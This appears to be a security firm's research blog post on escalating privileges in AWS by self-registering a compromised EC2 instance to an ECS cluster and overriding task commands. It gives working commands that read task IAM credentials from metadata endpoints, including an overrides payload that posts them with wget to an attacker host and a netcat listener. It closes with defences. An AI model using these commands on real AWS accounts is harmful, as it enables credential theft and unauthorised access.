Another ECS Privilege Escalation Path
-
Mohit Gupta
Tom Taylor-MacLean
- 19 Aug 2025
Last year, Reversec (at the time WithSecure) wanted to investigate which resources could be compromised from an assumed-breach virtual machine (EC2) instance within a simulated client environment. This was inspired by configurations we often see in client work during engagements such as Attack Path Mapping (APM), where discovering and exploiting new paths enables privilege escalation or lateral movement. Our lab setup was as follows:
Starting from a “compromised” EC2 instance within our lab environment, with ReadOnly access to the AWS account to give us additional visibility of our resources, we were able to discover a novel attack path. Through the configuration of EC2 and Elastic Container Service (ECS) resources, we escalated our initial privileges and accessed secrets that we had created for the purposes of testing. In a real engagement, this could allow us to pivot between previously segregated environments, or to access areas requiring authentication.
Within ECS, many different configurations are possible, so we focus on two specific example attack paths. Of course, differences in any client’s setup may require some adjustment to replicate the attack, especially where networking controls differ. We first demonstrate how to self-register an EC2 instance to a cluster and then override the task definition’s start command, allowing us to gather the IAM credentials of the ECS task. We then perform the same privilege escalation in an environment where the cluster uses Fargate.
The instance profile assigned to our assumed-breach EC2 contained the following AWS permissions, of which the first three were contained in the AWS-managed policy AWSElasticBeanstalkMulticontainerDocker:
ecs:StartTask
ecs:RegisterContainerInstance
ecs:DeregisterContainerInstance
iam:PassRole
The iam:PassRole permission was restricted to allow a single role to be passed. That role had the AWS-managed AmazonECSTaskExecutionRolePolicy policy attached to it.
This, naturally, suggests that an ECS cluster is running within the account, so using our ReadOnly permissions we looked to see what infrastructure was running within the cluster. Besides the cluster itself, which we had called ReversecCluster, only a single task definition had been set up, and no container instances were currently registered to the cluster.
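For reference, this enumeration needed nothing more than standard read-only AWS CLI calls along the following lines (the cluster name is the one from our lab):
aws ecs list-clusters
aws ecs describe-clusters --clusters ReversecCluster
aws ecs list-task-definitions
aws ecs list-container-instances --cluster ReversecCluster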
While it initially appeared that we had no infrastructure within the cluster on which we could run tasks, our EC2’s permissions allowed us to register a container instance. So, we thought, why not register our current EC2 to the cluster? We found that there were two ways to do this: we could either download and run the ECS agent on our EC2, or we could call the RegisterContainerInstance API directly.
To allow interaction with ECS resources, we downloaded and installed the ECS agent on our EC2. Depending on the Linux distribution installed on the EC2, this was done using one of the following sets of commands.
For Amazon Linux or Red Hat-based distributions:
curl -O https://s3.eu-west-2.amazonaws.com/amazon-ecs-agent-eu-west-2/amazon-ecs-init-latest.x86_64.rpm
sudo yum localinstall -y amazon-ecs-init-latest.x86_64.rpm
Or, for Debian-based distributions:
curl -O https://s3.eu-west-2.amazonaws.com/amazon-ecs-agent-eu-west-2/amazon-ecs-init-latest.amd64.deb
sudo dpkg -i amazon-ecs-init-latest.amd64.deb
The AWS documentation states that RegisterContainerInstance is only supposed to be used by the ECS agent. However, rather than being constrained by what the documentation says should happen, we spent some time finding the necessary parameters and values to call it ourselves. At this point, we could register our container instance manually from our EC2 using the following commands:
curl http://169.254.169.254/latest/dynamic/instance-identity/document -o document
curl http://169.254.169.254/latest/dynamic/instance-identity/signature -o signature
aws ecs register-container-instance --cluster ReversecCluster --instance-identity-document file://document --instance-identity-document-signature file://signature --total-resources name=CPU,type=INTEGER,integerValue=1
However, an easier route was to adjust the /etc/ecs/ecs.config file as follows and then start the ECS service, so that our EC2 would be registered with the existing ECS cluster. This had to be done using the existing cluster, as in this scenario we had no permissions to create a new one:
ECS_CLUSTER=ReversecCluster
With that, we started the service and watched to see that our EC2 had been registered as infrastructure within the ECS cluster and was available to run tasks:
sudo systemctl start ecs
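To confirm that the registration had succeeded, the cluster can be checked again with the ReadOnly credentials, or the agent’s local introspection endpoint (which listens on port 51678 by default) can be queried from the instance itself, for example:
aws ecs list-container-instances --cluster ReversecCluster
curl -s http://localhost:51678/v1/metadata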
To access the containers that were created during task execution, we also needed to install Docker (if this hadn’t already been done):
sudo yum install docker
We discovered that the ECS StartTask API accepts an overrides parameter. If a new set of commands is supplied through this parameter, those commands are executed on container start instead of the commands specified in the task definition. As our objective was to escalate our privileges, we used an overrides JSON file (shown below) that caused a container to be created, perform no actions, and simply remain alive until it was shut down.
Let us assume that a task definition was already available within the environment. For the purposes of our attack, we do not care what commands the task is supposed to execute, but we do need to know the task definition’s name, so that we can reference it in our API calls, and the container’s name, to reference in the overrides file below.
{
    "containerOverrides": [
        {
            "name": "ExistingContainer",
            "command": [
                "sleep",
                "infinity"
            ]
        }
    ]
}
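If the container name is not already known, it can be recovered from the task definition with the ReadOnly access, for example (the task definition name is the one from our lab):
aws ecs describe-task-definition --task-definition ReversecTaskDef --query 'taskDefinition.containerDefinitions[].name'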
With our ReadOnly permissions, we collected the task definition and container names as above, then used the following command to start the overridden task:
aws ecs start-task --cluster ReversecCluster --container-instances arn:aws:ecs:eu-west-2:111122223333:container-instance/ReversecCluster/5bfcf99482d443129a7360e2d0a712b0 --overrides file://overrides --task-definition ReversecTaskDef --network-configuration "awsvpcConfiguration={subnets=[subnet-05370db71332997ac],securityGroups=[sg-029098f0f1df1377c],assignPublicIp=DISABLED}"
A few of the parameters needed populating for the command to work correctly. With ReadOnly access within the account, we were able to enumerate these simply by searching. Alternatively, the container-instances value can be found in the /var/log/ecs/ecs-init.log file on the EC2, and the subnet and Security Group IDs can be retrieved from the Instance Metadata Service (IMDS) within the EC2 at the following respective endpoints:
http://169.254.169.254/latest/meta-data/network/interfaces/macs/02:7d:7e:c3:c5:0b/subnet-id
http://169.254.169.254/latest/meta-data/network/interfaces/macs/02:7d:7e:c3:c5:0b/security-group-ids
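The MAC address in these paths is specific to our lab instance; it can be discovered first and then substituted, along these lines (IMDS returns each MAC with a trailing slash, so it can be appended directly):
MAC=$(curl -s http://169.254.169.254/latest/meta-data/network/interfaces/macs/ | head -n1)
curl -s http://169.254.169.254/latest/meta-data/network/interfaces/macs/${MAC}subnet-id
curl -s http://169.254.169.254/latest/meta-data/network/interfaces/macs/${MAC}security-group-ids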
Note that if we had been granted the iam:PassRole permission for a broader set of roles, we could also have added a taskRoleArn parameter to our overrides file. This would have allowed us to escalate to that role, in a more classic ECS privilege escalation technique (an illustrative overrides file for this case is sketched below); in our setup, however, we were unable to adjust the role of the ECS task. Additionally, assignPublicIp is set to DISABLED here, but this may require adjusting depending on the networking setup in the target environment.
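For illustration, an overrides file taking advantage of such a broader iam:PassRole grant could look like the following; the role ARN here is purely hypothetical:
{
    "taskRoleArn": "arn:aws:iam::111122223333:role/HypotheticalPrivilegedRole",
    "containerOverrides": [
        {
            "name": "ExistingContainer",
            "command": ["sleep", "infinity"]
        }
    ]
}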
As the task had been started in a container on the EC2 over which we had command execution, we were able to find the container ID by running:
sudo docker ps
Once the container had initialised, we could start a shell within it:
sudo docker exec -it 700f993d892f sh
By making use of the standard environment variables within an ECS container, we obtained the URL of the ECS container credentials endpoint, which we could call to retrieve the credentials of the task’s IAM role:
curl http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI
At this point, by using these temporary credentials, we had escalated our privileges from those assigned to the EC2 instance to those assigned to the ECS task. In client environments, we have seen such tasks used to retrieve secrets from Secrets Manager or assigned other privileged permissions.
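As a minimal sketch of consuming the response, the returned AccessKeyId, SecretAccessKey and Token values can be exported as the standard AWS environment variables and the new identity confirmed:
export AWS_ACCESS_KEY_ID=<AccessKeyId from the response>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey from the response>
export AWS_SESSION_TOKEN=<Token from the response>
aws sts get-caller-identity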
As a note, Reversec executed this full attack path multiple times to demonstrate that it was consistently possible. To do this, we deregistered the EC2 as a container instance so that we could start afresh, but then hit errors when trying to register it again. After some searching, we came across an issue in the ECS agent’s GitHub repository, which explained that deregistering is supposed to be final, but that it can be worked around: “remove the agent’s checkpointed data (at /var/lib/ecs/data/* by default) before starting the agent, but all previously managed containers will be forgotten about or ‘orphaned’ as well.”
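In practice, resetting the agent between attempts looked something like the following (paths as per the GitHub issue; this also discards any state about previously managed containers):
sudo systemctl stop ecs
sudo rm -rf /var/lib/ecs/data/*
sudo systemctl start ecs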
As a variation of the technique described above, we considered the use of the RunTask API on Fargate. As Fargate provisions the necessary infrastructure on demand, fewer permissions were needed; the attack worked with the EC2 instance having only:
ecs:RunTask
iam:PassRole
As before, the iam:PassRole permission was restricted to allow a single role to be passed, and that role had the AWS-managed AmazonECSTaskExecutionRolePolicy attached.
In this case, we set assignPublicIp to ENABLED so that our ECS task could download an image (alpine) from the public Docker registry and call out to our “attacker” EC2 hosted in a separate AWS account. To improve our automation, we obtained the credentials and sent them directly to our attacker-owned EC2 from within the overrides file. Here, the wget command is used, as curl is not available in the alpine Docker image:
{
    "containerOverrides": [
        {
            "name": "TTMContainer",
            "command": [
                "/bin/sh",
                "-c",
                "wget -O creds http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI && wget --post-file creds http://<attacker-ip>:4242"
            ]
        }
    ]
}
Enumerating as described earlier, we then used the command:
aws ecs run-task --cluster arn:aws:ecs:eu-west-1:637423251906:cluster/ReversecCluster2 --task-definition arn:aws:ecs:eu-west-1:637423251906:task-definition/WSTaskDef2:1 --network-configuration "awsvpcConfiguration={subnets=[subnet-0a9c3f5a41d855357],securityGroups=[sg-0bea7c2c147b18329],assignPublicIp=ENABLED}" --overrides file://overrides
A netcat listener on port 4242 on our “attacker” EC2 received the credentials, allowing us to assume the task’s role as expected. This completed our privilege escalation within the environment in a second manner.
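The listener itself was nothing more complicated than, for example:
nc -lvnp 4242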
As may have been apparent from the previous section, it is not straightforward to remove this type of privilege escalation if your EC2 is required to interact with ECS. The first question to ask is “does my EC2 really need to start or run tasks?”, as these are often scheduled events better suited to EventBridge Scheduler, or tasks started through the CI/CD pipeline. If an attacker is able to find valid credentials with which to call the StartTask or RunTask APIs from the AWS CLI, we did not find a way to restrict their ability to override the task. However, the use of task placement constraints may restrict an attacker’s ability to run the task, as illustrated below.
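For illustration, a placement constraint along these lines in the task definition (the attribute expression here is hypothetical) would limit which container instances the task may be placed on:
"placementConstraints": [
    {
        "type": "memberOf",
        "expression": "attribute:ecs.instance-type =~ t3.*"
    }
]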
If the interaction between EC2 and ECS is required, the best defence is to ensure that the tasks are pre-defined, perhaps through Infrastructure as Code, and to use a proxy to execute them. For example, a Lambda function could be set up that calls StartTask or RunTask with a predefined set of parameters and takes no inputs that are passed through to ECS. The EC2 instance would then invoke the Lambda to start or run a task, and it would not be possible to inject any additional command-line options. The instance profile attached to the EC2 should specify that it may invoke only the relevant Lambda function. The Lambda function’s resource policy should be restricted as much as possible, though it is not possible to use a resource policy to specify which EC2 instances may invoke it; condition keys within the IAM policy must therefore be applied practically and sensibly.
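As a sketch of the instance-profile side of this arrangement, assuming a hypothetical function named StartApprovedEcsTask (the ARN is purely illustrative), the policy attached to the EC2’s role could be restricted to something like:
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "lambda:InvokeFunction",
            "Resource": "arn:aws:lambda:eu-west-2:111122223333:function:StartApprovedEcsTask"
        }
    ]
}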
The following additional defence in depth measures may be applied to attempt to mitigate the attack path, but by themselves these do not address the root cause of the issue:
If the default cluster still exists, it should be removed in favour of a user-defined one. As described earlier, cluster names must be known to an attacker for this attack path to succeed. This would not, however, protect against an attacker with read privileges within the AWS account, for example an insider threat. While one may reduce the need for human interaction in production systems, attempting to apply security through obscurity remains a flawed approach.
Apply the principle of least privilege to all resources and policies within the environment. This should include using a lower-privileged user for EC2 operations; for example, if the EC2 is running a web application, the www-data user could be used for this purpose, and security assessments could be performed to ensure there are no privilege escalation paths to the root user. While this would prevent a threat actor with a foothold on the EC2 from self-registering it to a cluster, StartTask and RunTask operations would not be prevented.
Similarly, ensure Security Groups are used to restrict inbound and outbound traffic to and from EC2 instances, so that instances which have self-registered to the cluster cannot send traffic to a location of the attacker’s choosing. Remove default Security Groups, as if a task is able to execute with an attacker-defined awsvpc network configuration, the attacker could apply the default, unrestrictive Security Group. Alternatively, clusters could be set up in isolated VPCs as per AWS guidance.